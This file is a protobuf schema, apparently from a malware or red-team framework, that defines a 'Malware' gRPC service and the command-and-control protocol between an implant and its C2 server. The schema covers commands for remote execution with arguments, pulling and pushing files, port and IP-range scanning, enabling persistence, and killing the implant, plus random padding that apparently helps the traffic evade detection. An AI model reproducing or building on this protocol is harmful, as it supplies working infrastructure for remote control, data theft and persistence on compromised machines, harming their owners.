common/messages/messages.proto

syntax = "proto3";

package messages;

service Malware {
    rpc CheckCommandQueue (CheckCmdRequest) returns (CheckCmdReply) {}    
}

message PortScanReply {
    enum Status {
        IN_PROGRESS = 0;
        COMPLETE = 1;
    }

    Status status = 1;
    uint32 found = 2;
}
message IPScanReply {
    enum Status {
        IN_PROGRESS = 0;
        COMPLETE = 1;
    }

    Status status = 1;
    string ip = 2;
    uint32 port = 3;
}

message Exec {
    string Exec = 1;
    repeated string Args = 2;
}

message PortScan {
    string ip = 1;
    uint32 startPort = 2;
    uint32 endPort = 3;
    bool cancel = 4; // True if should cancel current running scan
}

message IPScan {
    string ip_range = 1;
    bool cancel = 2;
}

message GetFile {
    string filename = 1;
}

message UploadFile {
    string filename = 1;
    bytes contents = 2;
}

message Persistence {
    bool enable = 1;
}

// Implant -> C2
message CheckCmdRequest {
    bytes random_padding = 999;
    string module = 998;

    oneof message {
        int64 heartbeat = 1;
        bytes data = 2;
        PortScanReply portscan = 3; 
        IPScanReply ipscan = 4; 
        int32 error = 5; 

    }
}


// C2 -> Implant
message CheckCmdReply {
    bytes random_padding = 999;

    oneof message {
        int64 heartbeat = 1;
        int64 sleep = 2;
        bool listmodules = 3;        
        bool kill = 99; // Immediatly exit

        Exec exec = 10;
        GetFile getfile = 20;
        UploadFile uploadfile = 30; 
        PortScan portscan = 40;
        IPScan ipScan = 50;        
        Persistence persistence = 60;
    }
}
